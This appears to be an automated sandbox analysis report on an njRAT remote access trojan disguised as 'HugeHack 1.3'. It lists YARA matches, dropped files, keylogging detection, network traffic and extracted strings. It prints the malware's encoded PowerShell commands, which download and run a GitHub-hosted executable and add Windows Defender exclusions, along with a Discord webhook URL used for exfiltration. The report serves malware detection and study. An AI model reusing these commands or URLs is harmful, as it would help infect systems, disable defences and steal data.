Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/lexical-handler
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://xml.org/sax/properties/xml-string
Source: powershell.exe, 00000008.00000002.1903364315.0000000004819000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1903364315.0000000004825000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1429649555.0000000005418000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1429649555.0000000005427000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: webhook.exe, 00000003.00000002.1391090423.0000000002AAD000.00000004.00000800.00020000.00000000.sdmp, webhook.exe, 00000003.00000002.1391090423.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: webhook.exe, 00000003.00000002.1391090423.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: webhook.exe, 00000003.00000002.1391090423.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/d
Source: webhook.exe, 00000003.00000002.1391090423.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com
Source: HugeHack 1.3.exe.bin.exe, 00000000.00000003.1224675944.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, webhook.exe, 00000003.00000002.1391090423.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, webhook.exe, 00000003.00000002.1391090423.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, webhook.exe, 00000003.00000000.1224355173.0000000000632000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://discordapp.com/api/webhooks/1352684770521387070/EnDdIPnq1Toz0toXGIhTo1T09Jq8MMJhXvjTWp5MjXqB
Source: powershell.exe, 0000000E.00000002.1569667902.0000000004FA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com
Source: powershell.exe, 0000000E.00000002.1569667902.0000000004FA5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe
Source: powershell.exe, 0000000E.00000002.1569667902.0000000004FA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1712907932.00000000075B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: Payload.exe, 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/???
Source: webhook.exe, 00000003.00000000.1224355173.0000000000632000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: HugeHack 1.3.exe.bin.exe, 00000000.00000003.1224675944.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, webhook.exe, 00000003.00000000.1224355173.0000000000632000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.113.4:443 -> 192.168.2.4:49729 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: Payload.exe.0.dr, kl.cs	.Net Code: VKCodeToUnicode
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: dllhost.exe.2.dr, kl.cs	.Net Code: VKCodeToUnicode
Source: ClickMe.exe.2.dr, kl.cs	.Net Code: VKCodeToUnicode
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: c382eb151c59bd833b24120723eac541.exe.16.dr, kl.cs	.Net Code: VKCodeToUnicode

E-Banking Fraud

Malicious encrypted Powershell command line found

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=			Jump to behavior

Yara detected Njrat

Source: Yara match	File source: HugeHack 1.3.exe.bin.exe, type: SAMPLE
Source: Yara match	File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3698298941.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HugeHack 1.3.exe.bin.exe PID: 7552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Payload.exe PID: 7616, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED
Source: Yara match	File source: C:\ClickMe.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\AppData\Roaming\dllhost.exe

Process information set: 01 00 00 00

System Summary

Malicious sample detected (through community Yara rule)

Source: HugeHack 1.3.exe.bin.exe, type: SAMPLE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: HugeHack 1.3.exe.bin.exe, type: SAMPLE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: HugeHack 1.3.exe.bin.exe, type: SAMPLE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: HugeHack 1.3.exe.bin.exe, type: SAMPLE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.1.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Payload.exe.303fe20.0.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.Payload.exe.890000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.3.HugeHack 1.3.exe.bin.exe.cfeb10.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.0.HugeHack 1.3.exe.bin.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.Payload.exe.303fe20.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.0.HugeHack 1.3.exe.bin.exe.40ad30.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000000.1222141243.0000000000892000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.1222228623.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000000.1216428944.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000002.1334619345.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c382eb151c59bd833b24120723eac541.exe, type: DROPPED	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\ClickMe.exe, type: DROPPED	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\Payload.exe, type: DROPPED	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Detects njRAT based on some strings Author: Sekoia.io
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\dllhost.exe, type: DROPPED	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{13709620-C279-11CE-A49E-444553540000}			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==	Jump to behavior
